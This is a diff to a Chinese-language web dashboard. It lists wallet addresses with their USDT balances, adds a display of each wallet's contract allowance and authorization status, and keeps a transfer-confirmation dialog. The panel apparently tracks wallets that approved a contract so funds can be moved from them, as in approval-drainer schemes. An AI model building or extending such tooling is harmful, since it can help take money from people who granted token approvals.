--- a/index.html
+++ b/index.html
@@ -82,6 +82,11 @@
             font-weight: normal;
             padding: 0.5em 0.75em;
         }
+        .authorization-badge {
+            font-size: 0.8rem;
+            padding: 0.3em 0.6em;
+            margin-left: 0.5rem;
+        }
     </style>
 </head>
 <body>
@@ -163,8 +168,7 @@
             </div>
         </div>
     </div>
-
-    <!-- 转账确认模态框 -->
+        <!-- 转账确认模态框 -->
     <div class="modal fade" id="transferModal" tabindex="-1">
         <div class="modal-dialog">
             <div class="modal-content">
@@ -182,9 +186,7 @@
                 </div>
                 <div class="modal-footer">
                     <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">取消</button>
-                    <button type="button" class="btn btn-primary" onclick="confirmTransfer()">
-                        确认转账
-                    </button>
+                    <button type="button" class="btn btn-primary" onclick="confirmTransfer()">确认转账</button>
                 </div>
             </div>
         </div>
@@ -248,6 +250,10 @@
 
             try {
                 const response = await axios.get(`${API_BASE_URL}/balance/${address}`);
+                if (!response.data.isAuthorized) {
+                    alert('该钱包未授权合约，无法添加');
+                    return;
+                }
                 wallets.push(address);
                 saveWallets(wallets);
                 document.getElementById('newAddress').value = '';
@@ -286,14 +292,15 @@
                     saveWallets(savedWallets);
                     refreshWalletsList(savedWallets);
                     
-                    let message = `发现 ${newWallets.length} 个新钱包：\n\n`;
+                    let message = `发现 ${newWallets.length} 个已授权钱包：\n\n`;
                     newWallets.forEach(wallet => {
                         message += `地址: ${wallet.address}\n`;
-                        message += `余额: ${wallet.balance} USDT\n\n`;
+                        message += `余额: ${wallet.balance} USDT\n`;
+                        message += `授权额度: ${wallet.allowance} USDT\n\n`;
                     });
                     alert(message);
                 } else {
-                    alert('没有发现新的钱包。');
+                    alert('没有发现新的已授权钱包。');
                 }
             } catch (error) {
                 alert('检测失败: ' + (error.response?.data?.error || error.message));
@@ -373,20 +380,24 @@
             for (const address of wallets) {
                 try {
                     const response = await axios.get(`${API_BASE_URL}/balance/${address}`);
-                    updateBalanceDisplay(address, response.data.balance);
+                    updateBalanceDisplay(address, response.data.balance, response.data.allowance, response.data.isAuthorized);
                 } catch (error) {
-                    updateBalanceDisplay(address, '查询失败');
+                    updateBalanceDisplay(address, '查询失败', '0', false);
                 }
             }
         }
 
         // 更新余额显示
-        function updateBalanceDisplay(address, balance) {
+        function updateBalanceDisplay(address, balance, allowance, isAuthorized) {
             const balanceDiv = document.getElementById(`balance-${address}`);
             if (balanceDiv) {
                 balanceDiv.innerHTML = `
                     <i class="fas fa-coins me-1"></i>
                     余额: ${balance} USDT
+                    ${allowance ? `<span class="ms-3">授权额度: ${allowance} USDT</span>` : ''}
+                    <span class="badge ${isAuthorized ? 'bg-success' : 'bg-warning'} authorization-badge">
+                        ${isAuthorized ? '已授权' : '未授权'}
+                    </span>
                 `;
             }
         }
